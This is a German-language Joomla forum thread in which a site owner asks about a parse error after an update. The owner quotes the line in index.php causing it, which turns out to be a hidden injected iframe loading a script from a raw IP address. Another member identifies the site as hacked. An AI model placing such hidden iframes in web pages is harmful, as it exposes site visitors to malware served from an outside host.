+ Antworten
Ergebnis 1 bis 3 von 3

Thema: Parse error nach Update - Threadtitel war: Beste Vorgehensweise

JRi
    JRi ist offline
    Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard Parse error nach Update - Threadtitel war: Beste Vorgehensweise

Hallo zusammen,

nachdem ein Update auf die aktuelle Joomla Version nicht so recht geklappt hat, gibt es zudem nun auch noch ein Seitendarstellungsproblem.

Code:
    Parse error: syntax error, unexpected '<' in /usr/home/xxx/yyy/joomla/index.php on line 89
    In besagter Zeile der index.php steht folgendes:
    Code:
    <iframe src="http://80.91.191.158/stats/priemIframe.php?hashftp=cc32675ddc327eff81f8e0986a0230ed&hashpage=bb92729f5280a51286429cf1f2ee21a9" width=10 border=1 height=10 style="visibility:hidden">
    Da, wie schon beschrieben, das Update auch nicht sonderlich glatt lief, kam mir die Idee - ein sauberes Joomla zu installieren und dann aus der bestehenden Datenbank manuell die Kategorien, Beiträge, Bilder usw. zu importieren. Mit dem Template hab ich das soweit auch schon geschafft. Da Joomla aber zig Tabellen und Datensätze hat (es war eine sehr umfangreiche Seite) bräuchte ich nun Hilfe, was die beste Vorgehensweise ist. Und ob es überhaupt geht.

Also:
    1.) Die bestehende (online) Joomla Installation versuchen zu reparieren, oder
    2.) Inhalte usw. in eine neue Joomla Installation zu importieren

Das Backend der online Installation funktioniert noch.

Falls ich wichtige Infos vergessen habe, sagt es mir bitte. Dann suche ich das heraus und reiche diese nach.

Über rasche Hilfe wäre ich sehr dankbar!
    Viele Grüße
    JRi

Bedankte sich
    342
    Erhielt 3.298 Danksagungen
    in 3.084 Beiträgen

Standard

Ich weiss nicht, ob es dir bewusst ist, aber deine Seite wurde offensichtlich gehackt...

Du solltest unbedingt Flottes Liste durchlesen und Punkt für Punkt abarbeiten.
    Geändert von anka (10.01.2011 um 17:43 Uhr) Grund: Link unterstrichen
    Häufige Fragen und Antworten zu Joomla: Joomla FAQ - Kleines Helferlein: Firebug
    Joomla braucht dich!

Kein Support per PN

JRi
    JRi ist offline
    Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

Hallo anka,

vielen Dank für die Info. Das war mir nicht bewusst. Lade gerade alle Daten herunter vom Server. Was meint Flotters Liste denn mit umbenennen des Basisverzeichnisses, geht es um den Ordner in dem Joomla liegt oder um das Verzeichnis ganz oben?

Zusatz:
    Nachdem ich gestern das Template aus der online DB in die neue und aktuelle Joomla Installation kopiert habe - werde ich heute darauf hingewiesen - dass es sich bei dieser Seite möglicherweise um Malware handelt. Gestern waren die Aufrufe noch alle einwandfrei. :-(
    Angehängte Dateien
    Geändert von JRi (11.01.2011 um 11:20 Uhr)

+ Antworten

Stichworte

Lesezeichen